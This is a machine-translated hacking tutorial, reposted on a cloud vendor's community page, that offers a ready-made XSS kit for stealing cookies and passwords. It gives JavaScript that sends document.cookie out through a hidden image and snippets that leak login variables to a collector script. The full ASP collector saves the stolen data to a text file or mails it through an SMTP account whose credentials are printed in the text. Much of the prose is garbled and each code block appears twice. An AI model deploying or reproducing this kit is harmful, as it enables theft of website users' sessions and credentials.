XSS steals password cookie Generic script

Source: Internet
Author: User
Many people often need XSS to get cookies from others or to insert a script or password into a Web page.
Write a generic scripting tool today

Documents are as follows

Asp.asp or php.php or cookies.htm effects save text as follows


Send mail



Cookies to get



Intercept User name password



The main file get.asp is used to get the information sent and saved to TXT or sent to the mailbox
The content is as follows: Use method:
Asp.asp is an example of the call get.asp in ASP as follows
That is, where there is a need to get the variable to add the following JS code can be
It is usually added at the bottom of the page. Because variables are generally assigned, they are not emptied.
If you need to add JS in the middle of an ASP script, you need to close the statement. Normal browsing copy code printing code

<%
Username= "Admin"
password= "admin888″%> <script src=" get.asp?username=<%=username%>&password=<%=password%> " >
<% Response.Write Response.Cookies ()
%>
<%
Username= "Admin"
Password= "Admin888″
%>
<script src= "get.asp?username=<%=username%>&password=<%=password%>"/>
<%
Response.Write Response.Cookies ()
%>

Normal browsing copy Code printing code

?
$username = "admin"; $password = "Admin888″;
?>
<script src= "get.asp?username=<?= $username;? >&password=<?= $password;? > "/>
?
$username = "admin";
$password = "Admin888″;
?>
<script src= "get.asp?username=<?= $username;? >&password=<?= $password;? > "/>

Normal browsing copy Code printing code

<script>
var url= "get.asp?cookies=" +document.cookie; var image = new Image ();
image.style.width = 0; image.style.height = 0;
image.src = URL;
</script>
<script>
var url= "get.asp?cookies=" +document.cookie;
var image = new Image ();
image.style.width = 0;
image.style.height = 0;
image.src = URL;
</script>
Php.php is an example of use in PHP. The code is as follows: Cookies.htm is an example of cookies to get
Code as follows: have any questions and comments on the thread ...
Other than that.
All parameters can be added by themselves. You can get.asp?a=abc&b=abc&c=abcz&. How many variables are OK ... Get.asp? account =abc& Password =abc that's OK.
The specific use of their own will understand.
You need to go deep into cookies and adjust yourself according to the actual situation.
It's just a generic one. convenient example. Whirring
Normal browsing copy Code printing code

<%
Savefile= "Pass.txt"
' Save the TXT that gets the data
Ifsendmail=true ' whether to send by mail, if True then send message does not save TXT if False saves txt without sending mail yoursendmail= "webshell@163.com"
' The mailbox used to send
Yoursendmailuser= "521hack"
' Mailbox login username yoursendmailpass= ' 123456ABCF '
' E-mail login password (above 3 mailboxes, accounts, passwords changed into their own) here with my spare mailbox for you to test, 24 hours after I modify the password ...
Yoursendmailserver= "Smtp.163.com"
"Mail server yourmailtitle=" There are new data intercepted!
' Message headers
Yourrecvmail= "Xxxx@qq.com"
' Collect data to intercept the mailbox, suggest using QQ mailbox, can prompt in real time, let you get the information
Sub SendMail (content)
On Error Resume Next Dim jmail
Set JMail = Server.CreateObject ("jmail.message") jmail.logging = Truejmail.charset = "Gb2312″
Jmail.contenttype = "text/html" Jmail.from = yoursendmail jmail.fromname = "" &yoursendmailuser
Jmail.mailserverusername = Yoursendmailuser Jmail.mailserverpassword = Yoursendmailpass
jmail.priority = 1 Jmail.addrecipient yourrecvmail
Jmail.subject = Yourmailtitle Jmail.body = Content
Jmail.send ("smtp.163.com") Set JMail = Nothing
If Err then Response.Write send failed! Please check the configuration! and verify that your server supports jmail! " Else Response.Write "Send success!" End If End Sub

Getpoststr=request.querystring
If getpoststr= "" Then Response.Write "none!" End If
If Ifsendmail then Strtemp=replace (getpoststr, "=", ":")
Strtemp=replace (strtemp, "&", "<br>") SendMail (strtemp)
else set F=server. CreateObject ("Scripting.FileSystemObject")
Set I=f.opentextfile (Server.MapPath (savefile), 8,true,0) Tempstr=split (Getpoststr, "&")
For tempi=0 to Ubound (TEMPSTR) i.writeline (Replace (TempStr (tempi), "=", ":"))
Next I.writeline (now ())
I.writeline ("—————————— –") I.close
Set F=nothing End If
%>
<%
Savefile= "Pass.txt" save txt to get data
Ifsendmail=true ' whether to send messages using mail, if true, send mail without saving txt If false, save txt without sending mail
Yoursendmail= "521hack@163.com" is used to send a mailbox
yoursendmailuser= "521hack" ' Mailbox login username
yoursendmailpass= "123456ABCF" ' Mailbox login password (above 3 mailboxes, account number, password changed into their own) here with my spare mailbox for you to test, 24 hours after I modify the password ...
yoursendmailserver= "smtp.163.com" Mail server
Yourmailtitle= "There's a new data intercept!" ' Message headers
Yourrecvmail= "Xxxx@qq.com" ' collects the data to intercept the mailbox, the proposal uses the QQ mailbox, may prompt in real time, lets you get the information

Sub SendMail (content)
On Error Resume Next
Dim JMail
Set JMail = Server.CreateObject ("Jmail.message")
jmail.logging = True
Jmail.charset = "Gb2312″
Jmail.contenttype = "Text/html"
Jmail.from = Yoursendmail
Jmail.fromname = "" &yoursendmailuser
Jmail.mailserverusername = Yoursendmailuser
Jmail.mailserverpassword = Yoursendmailpass
jmail.priority = 1
Jmail.addrecipient Yourrecvmail
Jmail.subject = Yourmailtitle
Jmail.body = Content
Jmail.send ("smtp.163.com")
Set JMail = Nothing
If Err Then
Response.Write "Send failed!" Please check the configuration! and verify that your server supports jmail! "
Else
Response.Write "Send success!"
End If
End Sub

Getpoststr=request.querystring
If getpoststr= "" Then
Response.Write "None!"
End If

If Ifsendmail Then
Strtemp=replace (getpoststr, "=", ":")
Strtemp=replace (strtemp, "&", "<br>")
SendMail (strtemp)
Else
Set F=server. CreateObject ("Scripting.FileSystemObject")
Set I=f.opentextfile (Server.MapPath (savefile), 8,true,0)
Tempstr=split (Getpoststr, "&")
For tempi=0 to Ubound (TEMPSTR)
I.writeline (Replace (TempStr (tempi), "=", ":"))
Next
I.writeline (now ())
I.writeline ("—————————— –")
I.close
Set f=nothing
End If
%>

%> ' closed upper half part
This is JS.
<% ' Close the lower part
%> ' closed upper half part
This is JS.
<% ' Close the lower part

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.